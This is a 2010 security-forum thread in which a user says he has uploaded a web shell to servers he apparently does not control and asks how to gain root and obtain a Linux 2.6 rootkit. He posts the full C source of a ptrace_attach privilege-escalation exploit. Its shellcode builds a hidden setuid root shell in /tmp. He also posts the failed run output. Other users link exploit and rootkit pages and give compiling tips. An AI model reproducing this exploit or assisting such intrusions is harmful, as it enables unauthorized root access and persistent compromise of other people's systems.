 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Now what? |
 |
 Posted: Sun Jan 10, 2010 9:13 am |
 |
|
| AIR_Nayden |
| Advanced user |
 |
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
 |
|
 |
|
Hi 
These days I uploaded c100 on some servers... but there are directories which aren't editable by me. So my question is: how to escalate my privilegies or login as another user?
Please give more details, cause I'm not very good in working with unix systems... |
|
|
|
|
| Posted: Sun Jan 10, 2010 10:44 am |
|
|
| AIR_Nayden |
| Advanced user |
|
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
|
|
|
|
| does anyone have rootkit for 2.6.x linux kernel? |
|
|
|
|
| Posted: Sun Jan 10, 2010 2:35 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Quote: | | Please give more details, cause I'm not very good in working with unix systems... |
+
| Quote: | | does anyone have rootkit for 2.6.x linux kernel? |
Малко тъпо,нали? |
|
|
|
|
| Posted: Sun Jan 10, 2010 2:40 pm |
|
|
| vince213333 |
| Advanced user |
|
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
| Maybe he's a fast learner, pexli |
|
|
|
|
| Posted: Sun Jan 10, 2010 3:18 pm |
|
|
| AIR_Nayden |
| Advanced user |
|
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
|
|
|
|
| е не, защо да е тъпо? този, който имам нещо не иска да се компилира и за това си търся друг Можеш ли да помогнеш? |
|
|
|
|
| Posted: Sun Jan 10, 2010 3:34 pm |
|
|
| vince213333 |
| Advanced user |
|
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
| Code: | | http://www.enye-sec.org/en/programs.html |
3rd one in the list.
Or
| Code: | | http://seclists.org/dailydave/2008/q3/215 |
I hope it helps  |
|
|
|
|
|
|
|
|
| Posted: Sun Jan 10, 2010 3:36 pm |
|
|
| AIR_Nayden |
| Advanced user |
|
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
|
|
|
|
well, I found one, compiled it and tried to run it, but I suppose I didn't do that correct.
| Code: |
/*
ptrace_attach privilege escalation exploit by s0m3b0dy
[*] tested on Gentoo 2.6.29rc1
grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...
email: s0m3b0dy1 (at) gmail.com
*/
#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
unsigned long orig_eax, eip;
unsigned short cs, __cs;
unsigned long eflags, esp;
unsigned short ss, __ss;
};
main()
{
struct user_regs_struct322 regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd"; // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){
printf("\n[-] read registers\n");
exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
printf("\n[-] write shellcode\n");
exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}
|
When I run it I get this output:
| Quote: |
Usage: gpasswd [-r|-R] group
gpasswd [-a user] group
gpasswd [-d user] group
gpasswd [-A user,...] [-M user,...] group
[-] Attach
|
I guess gpasswd is some suid file(I have to give the path to it??). But what are the other parameters? How should I run this exploit correcetly? |
|
|
|
|
|
|
|
|
| Posted: Sun Jan 10, 2010 6:52 pm |
|
|
| gat3way |
| Regular user |
|
|
| Joined: Dec 11, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| Quote: | | http://www.enye-sec.org/en/programs.html |
Много интересно... |
|
|
|
|
| Posted: Sun Jan 10, 2010 7:13 pm |
|
|
| AIR_Nayden |
| Advanced user |
|
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
|
|
|
|
| Vince, do you have any idea how to compile the exploit, that you suggested? |
|
|
|
|
| Posted: Sun Jan 10, 2010 7:23 pm |
|
|
| vince213333 |
| Advanced user |
|
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
| gat3way wrote: | | Quote: | | http://www.enye-sec.org/en/programs.html |
Много интересно... |
Randomly googled 
And AIR_Nayden, it seems like C code to me. Based on the use of structures and -1 instead of the boolean "false" etc... Though I don't know that much of this kind of exploits.
Maybe use the programm gcc and try
| Code: | | gcc -c exploit.c -o nameOfExploitAfterCompiling |
I'm just guessing though, there are people on here who know much more of this than I do |
|
|
|
|
| Posted: Sun Jan 10, 2010 7:29 pm |
|
|
| AIR_Nayden |
| Advanced user |
|
|
| Joined: Dec 30, 2009 |
| Posts: 70 |
| Location: Bulgaria |
|
|
|
|
|
|
but which filename should I write? THere is more than one .c file  |
|
|
|
|
| Posted: Sun Jan 10, 2010 7:32 pm |
|
|
| vince213333 |
| Advanced user |
|
|
| Joined: Aug 03, 2009 |
| Posts: 737 |
| Location: Belgium |
|
|
|
|
|
|
| Try looking for the file with the "main" function in it. That's usually the function that is executed first in C. |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 69
Members: 0
Total: 69
